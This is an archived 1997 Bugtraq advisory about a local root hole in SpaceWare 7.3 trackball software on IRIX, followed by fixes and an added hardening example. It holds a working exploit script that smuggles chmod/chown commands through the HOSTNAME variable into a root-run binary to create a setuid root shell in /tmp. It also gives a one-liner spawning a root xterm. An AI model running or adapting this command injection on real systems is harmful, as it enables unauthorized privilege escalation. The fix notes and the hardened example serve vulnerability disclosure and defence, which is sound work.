root bug in spaceware
Description: Root hole in SpaceWare trackball software
Author: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
Compromise: root (local)
Vulnerable Systems: Presumably any system running spaceware 7.3 v1.0 (probably earlier). I don't know if it is IRIX specific. From the message it sounds like there are likely other holes in the program.
Date: 20 August 1997
Date: Wed, 20 Aug 1997 15:53:31 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: SpaceWare 7.3 v1.0
Hello
I guess anyone who's reading this has already noticed (if
you are playing with a SpaceBall), anyway here it goes:
===========================================================================
#!/bin/sh
SWDIR=/usr/local/SpaceWare
cp /bin/sh /tmp/sh
echo 6 | HOSTNAME="/bin/chmod 4755 /tmp/sh" \
$SWDIR/spaceball > /dev/null 2>&1
echo 6 | HOSTNAME="/bin/chown root /tmp/sh" \
$SWDIR/spaceball > /dev/null 2>&1
/tmp/sh
===========================================================================
more information:
IRIX 6.2
spaceware 7.3 v1.0 (http://www.spacetec.com/)
ftp://ftp.spacetec.com/put/spaceball2003and3003/drivers/app.irix.7_3.tar
(Obviously, you can use HOSTNAME for any command you want
to run as root, like
echo 6 | HOSTNAME="`which xterm` -e `which sh`" /usr/local/SpaceWare/spaceball
)
Fix:
a) rm (since spaceball.sh does lots of nasty things, like
running spaceball demos as root, probably this is the best
solution)
b) set HOSTNAME=/usr/bsd/hostname in the "Utilities" section of
$SWDIR/spaceball.sh
--
J.A. Gutierrez
finger me for PGP
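
Why fix (b) closes the hole, shown as an added example that is not part of the original post and is not SpaceWare code. The real spaceball.sh is not reproduced on this page, so the two "Utilities" styles, the function names `host_weak` and `host_pinned`, and the non-IRIX paths are assumptions.

```shell
#!/bin/sh
# Added example, not code from SpaceWare. Both "Utilities" styles below are
# assumed for illustration; the page does not show spaceball.sh itself.

# Weak style: the variable only receives a default, so a value exported by
# the caller survives. Expanded unquoted in command position, that value is
# word-split and its first word runs with the script's privileges.
host_weak() {
    HOSTNAME=${HOSTNAME:-hostname}
    $HOSTNAME
}

# Hardened style, following fix (b): overwrite the variable unconditionally
# from a fixed list of absolute paths, reset PATH, and quote the expansion
# so the value can only ever name a single program.
# /usr/bsd/hostname is the page's IRIX path; the other two candidates are
# assumed locations on other systems.
host_pinned() {
    PATH=/usr/bsd:/usr/bin:/bin
    export PATH
    HOSTNAME=
    for cand in /usr/bsd/hostname /bin/hostname /usr/bin/hostname; do
        if [ -x "$cand" ]; then
            HOSTNAME=$cand
            break
        fi
    done
    if [ -z "$HOSTNAME" ]; then
        echo "no trusted hostname binary found" >&2
        return 1
    fi
    "$HOSTNAME"
}
```

With the constructed, harmless input `HOSTNAME="echo injected"`, `host_weak` prints `injected`, while `host_pinned` discards the inherited value and runs only the pinned binary.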
This page is part of Fyodor's exploit
world.